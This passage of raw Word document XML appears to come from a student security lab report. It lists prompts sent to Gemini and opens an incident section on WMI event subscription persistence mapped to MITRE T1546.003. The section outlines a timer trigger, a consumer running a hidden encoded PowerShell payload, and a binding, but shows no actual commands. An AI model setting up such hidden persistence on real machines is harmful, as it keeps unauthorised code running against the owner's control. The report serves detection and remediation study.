          <w:p w14:paraId="40C90C7E" w14:textId="77777777" w:rsidR="00E03AF5" w:rsidRDefault="00E03AF5" w:rsidP="002E72EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Gemini:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE86107" w14:textId="77777777" w:rsidR="008D3E01" w:rsidRPr="008D3E01" w:rsidRDefault="008D3E01" w:rsidP="008D3E01">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04A8572E" w14:textId="24F52615" w:rsidR="00E03AF5" w:rsidRDefault="00E03AF5" w:rsidP="00E03AF5">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Prompts used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17236F00" w14:textId="5EE2B525" w:rsidR="00E03AF5" w:rsidRDefault="001D2848" w:rsidP="002E72EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>“Tell me everything I need to know about MITRE ATT&amp;CK: Scheduled Task (T1053.005)”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B33237D" w14:textId="77777777" w:rsidR="00F12651" w:rsidRPr="00F12651" w:rsidRDefault="00F12651" w:rsidP="00F12651">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="302E00B2" w14:textId="02C3ACE8" w:rsidR="001D2848" w:rsidRDefault="0017146C" w:rsidP="002E72EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">PASTED WHAT I DID TO GET PRIV ESC AND WAZUH OUTPUT AND ASKED “Above I have attached the steps I did to get privileged </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>escalation,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> I have also attached the wazuh response. Remediation Strategies for this attack, elaborate everything for me, tell me everything I need to know about it, explain to me clearly. Give me all of them in paragraphs each so I can easily understand.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C23A49" w14:textId="77777777" w:rsidR="00F12651" w:rsidRPr="00F12651" w:rsidRDefault="00F12651" w:rsidP="00F12651">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F11965D" w14:textId="77777777" w:rsidR="00F12651" w:rsidRPr="00F12651" w:rsidRDefault="00F12651" w:rsidP="00F12651">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="055BB87C" w14:textId="7C661D91" w:rsidR="00E82CE0" w:rsidRPr="00E03AF5" w:rsidRDefault="00E82CE0" w:rsidP="002E72EC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>“Suggest some security controls and mitigation recommendations, give me all of them in paragraphs each so I can easily understand.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60662FCB" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B447548" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRDefault="00B8236E">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5432A2" w14:textId="60DDFC0B" w:rsidR="00B8236E" w:rsidRDefault="7F2C5844" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc220896693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Incident #003 – Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="652744C5" w14:textId="77777777" w:rsidR="00B8236E" w:rsidRPr="003419C9" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc220896694"/>
      <w:commentRangeStart w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="36"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1428"/>
        <w:gridCol w:w="1424"/>
        <w:gridCol w:w="1401"/>
        <w:gridCol w:w="1808"/>
        <w:gridCol w:w="1409"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="3EF144FC" w14:paraId="28AAFB42" w14:textId="77777777" w:rsidTr="099E7C3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8" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="646E294F" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="322A3873" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E1EEE11" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1736" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46986772" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ED685C0" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="480F7D8F" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A78F3A2" w14:textId="77777777" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">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u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3EF144FC" w14:paraId="2922483A" w14:textId="77777777" w:rsidTr="099E7C3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8" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53B29BFA" w14:textId="4ACFFC67" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="059CCEA1" w14:textId="018E2DE0" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144F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T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="683B8DFB" w14:textId="419A78D9" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144F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Event Triggered Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1736" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09F8895D" w14:textId="6DCA459A" w:rsidR="3EF144FC" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3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Windows Management Instrumentation (WMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57BCE10C" w14:textId="3609BCD9" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144F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Windows (Windows 10/11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63E42440" w14:textId="06E530DC" w:rsidR="3EF144FC" w:rsidRDefault="3EF144FC" w:rsidP="3EF144F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Pr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>Admin (Elevated PowerShell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5274F6BF" w14:textId="7EFB548E" w:rsidR="27504325" w:rsidRDefault="3447F68C" w:rsidP="27504325">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technique justification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F590FD2" w14:textId="26B0C6F4" w:rsidR="53F6C94D" w:rsidRDefault="7B9F8C04" w:rsidP="53F6C94D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This incident demonstrates T1546.003 because persistence is established through a permanent WMI event subscription in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root\subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attacker created an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__EventFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (trigger), a CommandLineEventConsumer (payload execution), and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__FilterToConsumerBinding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(binding). This allows the system to re-execute the payload automatically on a timed trigger (every 60 seconds), including across reboots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9478B5" w14:textId="41E22E5D" w:rsidR="53F6C94D" w:rsidRDefault="53F6C94D" w:rsidP="53F6C94D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EFFF9C" w14:textId="605B4898" w:rsidR="00ED5F9B" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc220896695"/>
      <w:commentRangeStart w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:commentRangeEnd w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="38"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F120A" w14:textId="69336AA1" w:rsidR="234EA093" w:rsidRDefault="099E7C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD091BA" w14:textId="351BA6DB" w:rsidR="7333D4ED" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The objective of this technique is to ensure the attacker maintains long-term execution on the Windows endpoint without relying on traditional startup locations such as registry Run keys or scheduled tasks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> With WMI persistence, the payload is stored inside WMI and can run invisibly in the background based on a trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E269D" w14:textId="6C482B21" w:rsidR="234EA093" w:rsidRDefault="234EA093">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5B833D" w14:textId="7CC1E864" w:rsidR="30947F66" w:rsidRDefault="30947F66" w:rsidP="30947F66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What was performed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24487D" w14:textId="53591E83" w:rsidR="77AA56DF" w:rsidRDefault="77AA56DF" w:rsidP="77AA56DF">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A permanent WMI event subscription was created using three components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136EA09" w14:textId="37FE4A6C" w:rsidR="77AA56DF" w:rsidRDefault="77AA56DF" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__EventFilter – Defines the trigger condition using WQL (fires every 60 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307682A1" w14:textId="375CDD6D" w:rsidR="77AA56DF" w:rsidRDefault="77AA56DF" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>CommandLineEventConsumer – Executes a hidden PowerShell command (encoded payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC66E71" w14:textId="33284BB6" w:rsidR="77AA56DF" w:rsidRDefault="77AA56DF" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__FilterToConsumerBinding – Binds the filter to the consumer to activate persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF6B4E" w14:textId="4905A12E" w:rsidR="77AA56DF" w:rsidRDefault="77AA56DF" w:rsidP="77AA56DF">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
